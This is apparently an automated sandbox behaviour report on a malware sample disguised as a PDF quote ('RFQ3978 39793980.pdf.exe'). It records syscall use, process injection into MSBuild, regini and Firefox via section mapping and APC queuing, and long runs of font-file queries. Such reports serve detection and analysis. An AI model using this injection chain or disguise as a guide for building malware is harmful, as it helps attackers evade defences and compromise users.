                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtTerminateThread: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread register set: target process: 3520Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread APC queued: target process: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: shazRxxmQwU.exe, 00000006.00000000.2274651424.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560644981.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000000.2427253130.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: shazRxxmQwU.exe, 00000006.00000000.2274651424.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560644981.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000000.2427253130.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: shazRxxmQwU.exe, 00000006.00000000.2274651424.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560644981.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000000.2427253130.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: shazRxxmQwU.exe, 00000006.00000000.2274651424.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560644981.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000000.2427253130.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
